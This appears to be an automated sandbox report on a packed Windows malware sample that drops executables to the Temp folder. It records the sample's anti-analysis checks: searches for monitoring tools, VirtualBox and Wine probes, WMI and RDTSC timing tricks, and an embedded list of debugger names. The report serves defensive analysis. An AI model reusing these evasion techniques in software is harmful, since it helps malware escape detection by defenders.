Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: TNyOrM6mIM.exe

Static file information: File size 7080960 > 1048576

Source: TNyOrM6mIM.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x518a00
Source: TNyOrM6mIM.exe	Static PE information: Raw size of fsurptkt is bigger than: 0x100000 < 0x1a3200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Unpacked PE file: 0.2.TNyOrM6mIM.exe.850000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsurptkt:EW;mtouvxvi:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

2_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: PasoCattle.exe.0.dr	Static PE information: real checksum: 0x102e74 should be: 0x10b21d
Source: TNyOrM6mIM.exe	Static PE information: real checksum: 0x6cbad8 should be: 0x6c3101

Source: TNyOrM6mIM.exe	Static PE information: section name:
Source: TNyOrM6mIM.exe	Static PE information: section name: .idata
Source: TNyOrM6mIM.exe	Static PE information: section name:
Source: TNyOrM6mIM.exe	Static PE information: section name: fsurptkt
Source: TNyOrM6mIM.exe	Static PE information: section name: mtouvxvi
Source: TNyOrM6mIM.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0171CC01 pushfd ; retf	3_3_0171CC11
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_0172521F pushad ; ret	3_3_01725220

Source: TNyOrM6mIM.exe

Static PE information: section name: fsurptkt entropy: 7.953041341484228

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Jump to dropped file
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Jump to dropped file
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AF26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		14_2_00AF26DD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A7FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		14_2_00A7FC7C

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_14-104870

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2380121597.0000000000852000.00000040.00000001.01000000.00000003.sdmp, TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: FE9A04 second address: FE9A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115BC82 second address: 115BC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115B185 second address: 115B18D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115B18D second address: 115B1A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FEE6Eh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115B58C second address: 115B593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115D5FD second address: 115D602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115D73B second address: 115D73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115D7EC second address: 115D857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD6F84FEE66h 0x00000009 jl 00007FD6F84FEE66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 add dword ptr [esp], 655210C7h 0x00000019 mov dword ptr [ebp+122D34A1h], eax 0x0000001f push 00000003h 0x00000021 jnc 00007FD6F84FEE6Ch 0x00000027 mov esi, dword ptr [ebp+122D37E0h] 0x0000002d add dword ptr [ebp+122D1AB1h], edx 0x00000033 push 00000000h 0x00000035 or dword ptr [ebp+122D34BDh], ecx 0x0000003b mov edi, dword ptr [ebp+122D37E8h] 0x00000041 push 00000003h 0x00000043 jmp 00007FD6F84FEE79h 0x00000048 push 508D8EDCh 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 jbe 00007FD6F84FEE66h 0x00000056 pop eax 0x00000057 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115D857 second address: 115D862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FD6F84FD816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115D986 second address: 115D991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 115D991 second address: 115DA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 254A0BB4h 0x0000000d mov dl, ch 0x0000000f jmp 00007FD6F84FD81Bh 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FD6F84FD818h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov ecx, dword ptr [ebp+122D3750h] 0x00000036 push 00000000h 0x00000038 jmp 00007FD6F84FD81Eh 0x0000003d push 00000003h 0x0000003f xor dword ptr [ebp+122D33D8h], ecx 0x00000045 sub edx, 01AE31D9h 0x0000004b push FF08BCA4h 0x00000050 jmp 00007FD6F84FD824h 0x00000055 xor dword ptr [esp], 3F08BCA4h 0x0000005c mov edx, dword ptr [ebp+122D36A8h] 0x00000062 lea ebx, dword ptr [ebp+124474EAh] 0x00000068 movsx edi, dx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f jmp 00007FD6F84FD81Fh 0x00000074 push ebx 0x00000075 pop ebx 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117E3A3 second address: 117E3C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD6F84FEE76h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C674 second address: 117C678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C678 second address: 117C681 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C681 second address: 117C687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C687 second address: 117C68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C68C second address: 117C697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD6F84FD816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C697 second address: 117C69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C69D second address: 117C6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117C6A8 second address: 117C6B2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD6F84FEE66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CAC2 second address: 117CAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CAC7 second address: 117CAD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CDF2 second address: 117CDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CDF6 second address: 117CDFC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CDFC second address: 117CE01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
